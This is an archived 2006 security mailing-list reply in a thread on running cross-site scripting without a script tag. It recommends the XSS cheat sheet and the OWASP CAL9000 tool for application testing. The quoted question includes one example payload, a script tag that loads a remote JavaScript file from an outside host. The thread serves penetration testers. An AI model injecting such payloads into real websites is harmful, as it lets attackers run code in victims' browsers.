RE: XSS - how to run script

From: Joshua Perrymon (josh.perrymon@purehacking.com)
Date: Thu Oct 19 2006 - 19:09:46 EDT

• Next message: pdp (architect): "Re: XSS - how to run script"
• Previous message: Duncan McAlynn: "RE: SNMP write permissions in "Windows 2003""
• In reply to: A. R.: "Re: XSS - how to run script"
• Next in thread: pdp (architect): "Re: XSS - how to run script"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

> One of the best repositories of exotic ways to perform XSS
> (with or without evasion, with or without script tag) is the
> XSS cheat sheet:
> http://ha.ckers.org/xss.html

>>> I Agree 100%. I would look at the Cal9000 tool on the OWASP website.
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
It uses Rsnakes XSS library and includes it in a Website/Tool/Scratchpad to
use during these APP tests. I put Cal9000 on the first version of the OWASP
Live CD but it won't be released for another Month. If you use it just make
sure your Browser is Firefox... It doesn't like Opera or others.

Cheers,

JP

Joshua Perrymon, CE|H,OPST,OPSA

Sr. Security Consultant

-----------------------------------------

Pure Hacking - The Leaders In Internet Security

> -----Original Message-----
> From: listbounce@securityfocus.com
> [mailto:listbounce@securityfocus.com] On Behalf Of A. R.
> Sent: Friday, 20 October 2006 6:23 AM
> Cc: Penetration Testing; Web Application Security
> Subject: Re: XSS - how to run script
>
> One of the best repositories of exotic ways to perform XSS
> (with or without evasion, with or without script tag) is the
> XSS cheat sheet:
> http://ha.ckers.org/xss.html
>
> hth
>
> --
> icesurfer
>
> Tal Argoni wrote:
> > Does anyone have any
> > techniques/knowledge/examples/ideas/etc
> > of how it possible to run script
> > without using the <script> tag,
> > and without evasion techniques ?
> > <script
> > src=http://www.www.com/XSS.js></script>
> > Thanks allot
> > LegendaryZion
> >
> >
> >
> >
> ----------------------------------------------------------------------
> > --
> > This List Sponsored by: Cenzic
> >
> > Need to secure your web apps?
> > Cenzic Hailstorm finds vulnerabilities fast.
> > Click the link to buy it, try it or download Hailstorm for FREE.
> >
> http://www.cenzic.com/products_services/download_hailstorm.php?camp=70
> > 1600000008bOW
> >
> ----------------------------------------------------------------------
> > --
> >
> >
>
> --------------------------------------------------------------
> ----------
> This List Sponsored by: Cenzic
>
> Need to secure your web apps?
> Cenzic Hailstorm finds vulnerabilities fast.
> Click the link to buy it, try it or download Hailstorm for FREE.
> http://www.cenzic.com/products_services/download_hailstorm.php
> ?camp=701600000008bOW
> --------------------------------------------------------------
> ----------
>
>
>
>

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

• Next message: pdp (architect): "Re: XSS - how to run script"
• Previous message: Duncan McAlynn: "RE: SNMP write permissions in "Windows 2003""
• In reply to: A. R.: "Re: XSS - how to run script"
• Next in thread: pdp (architect): "Re: XSS - how to run script"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:13 EDT